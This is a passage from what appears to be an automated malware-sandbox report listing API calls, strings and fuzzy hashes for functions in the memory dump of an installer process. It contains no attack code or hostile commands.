                                                              • Opcode Fuzzy Hash: 74401bb3cc222331866baf5b7c9238539ae3b2ed33b42e576d12d648af5136f9
                                                              • Instruction Fuzzy Hash: 73418A75A10219EFDF04DFA5C895AEEBBB2FF58304F00452AE512ABA91C734D904CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93BDEE Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93BDF5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C93BD95: __EH_prolog3.LIBCMT ref: 6C93BD9C
                                                                • Part of subcall function 6C93953C: __EH_prolog3.LIBCMT ref: 6C939543
                                                              • _free.LIBCMT ref: 6C93BE65
                                                                • Part of subcall function 6C96BE0E: HeapFree.KERNEL32(00000000,00000000,?,6C96D3BD,00000000,?,6C94831D,6C96BD2E,6C96C03C,00000000), ref: 6C96BE24
                                                                • Part of subcall function 6C96BE0E: GetLastError.KERNEL32(00000000,?,6C96D3BD,00000000,?,6C94831D,6C96BD2E,6C96C03C,00000000), ref: 6C96BE36
                                                              • #141.MSI(00000003,00000000,?,00000000,?,?,6C90AB18,?,6C90AB18,00000024,6C94C05B,?,?,?,?,?), ref: 6C93BE9D
                                                              • GetCommandLineW.KERNEL32(?,00000000,?,?,6C90AB18,?,6C90AB18,00000024,6C94C05B,?,?,?,?,?,?,?), ref: 6C93BEA5
                                                              • #141.MSI(00000102,00000000,?,00000000,?,?), ref: 6C93BED7
                                                              • #281.MSI(Function_0004BFA8,00000922,?,00000000,?,?), ref: 6C93BEE5
                                                              • #137.MSI(Function_0004BF8A,00007FDF,?,?,?), ref: 6C93BEF6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$#141$#137#281CommandErrorFreeHeapLastLine_free
                                                              • String ID:
                                                              • API String ID: 2896052883-0
                                                              • Opcode ID: eb31b34eb6a0190561f0d92c13c011c5611156247c7d930238e200c4ad305179
                                                              • Instruction ID: abaed40a079cdbb1fd78184d887506730723cf8180296f42ae33c7808f176539
                                                              • Opcode Fuzzy Hash: eb31b34eb6a0190561f0d92c13c011c5611156247c7d930238e200c4ad305179
                                                              • Instruction Fuzzy Hash: 513150B1501788AFDB20DFA9C845A8ABBF8BF28308F10451DE59A97B41C774E548CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C935E71 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C935E89
                                                              • GetLastError.KERNEL32 ref: 6C935E91
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6C935EB2
                                                              • ResetEvent.KERNEL32(00000000), ref: 6C935EB9
                                                              • CloseHandle.KERNEL32(00000000), ref: 6C935EE8
                                                              Strings
                                                              • Launching Install operation. Download operation is completed., xrefs: 6C935EC4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Event$CloseCreateErrorHandleLastObjectResetSingleWait
                                                              • String ID: Launching Install operation. Download operation is completed.
                                                              • API String ID: 1135383174-2441870237
                                                              • Opcode ID: bf4c36e51ab0e797d18caf2432c377442d344573639ecbaa6a9ca244568367e4
                                                              • Instruction ID: af6ade630a16d8637e878001a3ca4a7bc79fda02ea70afedf0896cae6318906a
                                                              • Opcode Fuzzy Hash: bf4c36e51ab0e797d18caf2432c377442d344573639ecbaa6a9ca244568367e4
                                                              • Instruction Fuzzy Hash: 7211AD75600209BFCB20DF64C849FAEBBB5EB8A758F208018EA25A72C0D770D541CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C96AD61 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,6C96ADB1), ref: 6C96AD70
                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C96AD87
                                                              • GetProcAddress.KERNEL32(DecodePointer), ref: 6C96AD99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                              • API String ID: 2238633743-1525541703
                                                              • Opcode ID: 9b79bdc49eb8fef9efe4981bc11805bd22b19241f2b074b4ff856a06b15528a4
                                                              • Instruction ID: e31fc596306cab2995837a678bb1e1008680b4402dd771bc178b12e26d407c2d
                                                              • Opcode Fuzzy Hash: 9b79bdc49eb8fef9efe4981bc11805bd22b19241f2b074b4ff856a06b15528a4
                                                              • Instruction Fuzzy Hash: A8E0EC70B0C2649ECF549BF1F808A4A3FF9AB8A298B24451BE42492900DB348045DF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94BD48 Relevance: 9.1, APIs: 6, Instructions: 90windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 6C94BD62
                                                              • GetTickCount.KERNEL32 ref: 6C94BD72
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C94BDF3
                                                              • TranslateMessage.USER32(?), ref: 6C94BE01
                                                              • DispatchMessageW.USER32(?), ref: 6C94BE0B
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C94BE1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Message$Peek$CountDispatchMultipleObjectsTickTranslateWait
                                                              • String ID:
                                                              • API String ID: 732506675-0
                                                              • Opcode ID: 1663626f52b1a12052a8c668211d7a891d9dfe5cdf519a2e4c3783206c9a48fe
                                                              • Instruction ID: d8c0a51f5056d4294e769029ac677dcbcf570edc48fdeb6e83011b1b81c8aed1
                                                              • Opcode Fuzzy Hash: 1663626f52b1a12052a8c668211d7a891d9dfe5cdf519a2e4c3783206c9a48fe
                                                              • Instruction Fuzzy Hash: 1F31D8F2A00708ABDB119FB1C884DDF7BFDEF45755B244969E152A2550EB31D884CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C918F47 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • schema validation failure: child element not found - , xrefs: 6C919020
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$AllocException@8FreeH_prolog3Throw
                                                              • String ID: schema validation failure: child element not found -
                                                              • API String ID: 3394977177-3859288074
                                                              • Opcode ID: aa66a92b21966c96c40f26254ceb5f0afc136efb9d46170e2dba6ae614f99f60
                                                              • Instruction ID: 9e662961933a28e5749684c875b8b050552714f9512c0ec821da6437aadb1e9d
                                                              • Opcode Fuzzy Hash: aa66a92b21966c96c40f26254ceb5f0afc136efb9d46170e2dba6ae614f99f60
                                                              • Instruction Fuzzy Hash: FF417FB1900249EFCB04DFA8C9849DEBBB9BF19318F244569F511E7B40CB30DA15DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C953E97 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953E9E
                                                                • Part of subcall function 6C95401F: __EH_prolog3.LIBCMT ref: 6C954026
                                                                • Part of subcall function 6C95401F: GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C954041
                                                                • Part of subcall function 6C95401F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104), ref: 6C9540B3
                                                                • Part of subcall function 6C95401F: PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C954101
                                                              • __CxxThrowException@8.LIBCMT ref: 6C953F43
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • GetFileSize.KERNEL32(?,00000000,00000080,80000000,00000001,00000003,00000080,00000000,?), ref: 6C953F4C
                                                              • CloseHandle.KERNEL32(?), ref: 6C953F6A
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$File$CloseDispatcherExceptionException@8ExistsHandleLocaleModuleNamePathSizeThreadThrowUser
                                                              • String ID: DHTML Header: %s
                                                              • API String ID: 3827389996-3243986505
                                                              • Opcode ID: 5a01ccdba57c30fc50e0996e66201f3a2976249253c9c5a469f88e6167f3eb58
                                                              • Instruction ID: 689ecf6bf218e5bf2690370b73b335cd4878a1b47760bee4a7366e3ed167fb3b
                                                              • Opcode Fuzzy Hash: 5a01ccdba57c30fc50e0996e66201f3a2976249253c9c5a469f88e6167f3eb58
                                                              • Instruction Fuzzy Hash: 4C414971900209EFDF14DFA8D845ADEBBB9BF29318F14055AE110B7A80CB34DA598BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C956D61 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C956D68
                                                              • __CxxThrowException@8.LIBCMT ref: 6C956E31
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • ReadFile.KERNEL32(00000003,00000000,?,?,00000000,?,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?), ref: 6C956E4D
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 6C956E6C
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CloseDispatcherExceptionException@8FileHandleReadThrowUser
                                                              • String ID: File: %s
                                                              • API String ID: 3209669068-1010730093
                                                              • Opcode ID: b824e3ea3571e5e088b5cd66f73752fb02daf56741c972da120e10b50f815aa6
                                                              • Instruction ID: b40f013a071ac8e15b59235473365e1ed2777e910eb118a843c501f10b0398fc
                                                              • Opcode Fuzzy Hash: b824e3ea3571e5e088b5cd66f73752fb02daf56741c972da120e10b50f815aa6
                                                              • Instruction Fuzzy Hash: 46316971900249EFDB10DFA8C845ADEBBB8BF25308F14845AE910B7B80C771DE19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C935D96 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Item(s) availability state is "Error". Exiting setup., xrefs: 6C935DD7
                                                              • Launching Download operation. Install operation will follow after download is complete., xrefs: 6C935E3B
                                                              • Launching Download and Install operations simultaneously., xrefs: 6C935E4F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountTick
                                                              • String ID: Item(s) availability state is "Error". Exiting setup.$Launching Download and Install operations simultaneously.$Launching Download operation. Install operation will follow after download is complete.
                                                              • API String ID: 536389180-143185584
                                                              • Opcode ID: 53fc876b6897278e58f08a1e474d86d7e5affbb9841d05ad81247492954e93a6
                                                              • Instruction ID: 95c260b28830b46d35f0b15e29aa2b58cf1e8c2cf041ec5559672635fa6c713f
                                                              • Opcode Fuzzy Hash: 53fc876b6897278e58f08a1e474d86d7e5affbb9841d05ad81247492954e93a6
                                                              • Instruction Fuzzy Hash: 16315035208310AFC724DF28C488E1ABBF5FF49755B054958E59A8B7A1CB31E905CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C935EFB Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,74DF23A0), ref: 6C935F12
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,74DF23A0), ref: 6C935F1C
                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF,?,74DF23A0), ref: 6C935F5B
                                                              • CloseHandle.KERNEL32(?,?,74DF23A0), ref: 6C935F6A
                                                              • CloseHandle.KERNEL32(?,?,74DF23A0), ref: 6C935F6F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateEventHandle$MultipleObjectsWait
                                                              • String ID:
                                                              • API String ID: 3314610268-0
                                                              • Opcode ID: 358cd7a99b51df3f002716520d955208ed0b7acf67c2bde112d04a6bd5a35574
                                                              • Instruction ID: efbfee8ecfe978dfe1742edc6e807c384f4d489597f0c870d71e3244173923ec
                                                              • Opcode Fuzzy Hash: 358cd7a99b51df3f002716520d955208ed0b7acf67c2bde112d04a6bd5a35574
                                                              • Instruction Fuzzy Hash: 25211D75E00259AFDF04DBA9C880DEEBBBAEB8D354F10816AF525A7250D7709D40CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C971EDB Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd.LIBCMT ref: 6C971EE7
                                                                • Part of subcall function 6C96D3D1: __getptd_noexit.LIBCMT ref: 6C96D3D4
                                                                • Part of subcall function 6C96D3D1: __amsg_exit.LIBCMT ref: 6C96D3E1
                                                              • __getptd.LIBCMT ref: 6C971EFE
                                                              • __amsg_exit.LIBCMT ref: 6C971F0C
                                                              • __lock.LIBCMT ref: 6C971F1C
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 6C971F30
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                              • String ID:
                                                              • API String ID: 938513278-0
                                                              • Opcode ID: 735d17bc59ac1408e1fb4c56bb81679df9545489441931e1ba3019e153173b11
                                                              • Instruction ID: db41fda7af0ab52de0b4dc80fe6f330ac286078114df89851717945c92b1965b
                                                              • Opcode Fuzzy Hash: 735d17bc59ac1408e1fb4c56bb81679df9545489441931e1ba3019e153173b11
                                                              • Instruction Fuzzy Hash: DBF0903290B600DBE734ABA6D811B8D37A0AF22B2CF244609E41867FD1CB74D9549AA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944C39 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C944C43
                                                              • _memset.LIBCMT ref: 6C944C57
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 6C944C97
                                                                • Part of subcall function 6C968C9E: _memcpy_s.LIBCMT ref: 6C968CE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CurrentH_prolog3_Process_memcpy_s_memset
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 3477395303-3733053543
                                                              • Opcode ID: 52633a5ef5697e67e41e9c682e61f876e2541c2e43d1110eadc0e168ad83a4ec
                                                              • Instruction ID: a1b64d5864678370ea5c505908a0928589a1639c6320cc389bc4ef2a685ebc9c
                                                              • Opcode Fuzzy Hash: 52633a5ef5697e67e41e9c682e61f876e2541c2e43d1110eadc0e168ad83a4ec
                                                              • Instruction Fuzzy Hash: 0D411870A01218AFDB249F99CC88EDEB7B8FF99705F004499F549A7650DB30DA85CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C955F0B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95600F
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • __EH_prolog3.LIBCMT ref: 6C955F12
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C93DBB0: __EH_prolog3.LIBCMT ref: 6C93DBB7
                                                              Strings
                                                              • In IronManExeInstaller::IronManExeInstaller, xrefs: 6C955FB3
                                                              • In CartmanExeInstaller::CartmanExeInstaller, xrefs: 6C955F6B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser_malloc
                                                              • String ID: In CartmanExeInstaller::CartmanExeInstaller$In IronManExeInstaller::IronManExeInstaller
                                                              • API String ID: 3653670741-4107417756
                                                              • Opcode ID: 1831702fddbb447b8395c8169449ee96cad53305689446c99dd7a7e157a653df
                                                              • Instruction ID: b25aed2d9f96d9c960ff4c3b6bf28fbf10110ad2b1ceb23a2d76dfa7da70aa8a
                                                              • Opcode Fuzzy Hash: 1831702fddbb447b8395c8169449ee96cad53305689446c99dd7a7e157a653df
                                                              • Instruction Fuzzy Hash: 4541D071605345EAEF21CF68C945B8E3FA4AF25318F208419F948EBB92C771C960CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C937DA1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 6C937DEB
                                                              • ReadFile.KERNEL32(6C938045,00000000,00100000,?,00000000,?), ref: 6C937E4E
                                                              • CloseHandle.KERNEL32(6C938045,?), ref: 6C937E9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleRead
                                                              • String ID:
                                                              • API String ID: 1035965006-3916222277
                                                              • Opcode ID: d052ef88d74699f26aef4b1ad42c2ddd9ded7717f480097d67d71802610a27f5
                                                              • Instruction ID: 3570554c0282957821c1927780b36f22aab183c423c57d78c282d6d250609de4
                                                              • Opcode Fuzzy Hash: d052ef88d74699f26aef4b1ad42c2ddd9ded7717f480097d67d71802610a27f5
                                                              • Instruction Fuzzy Hash: 7F317C31A00218FFCF209F54C948FAE7B7AEF49755F2041A9F419AB2A0C771DA45DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C958E7D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C958E84
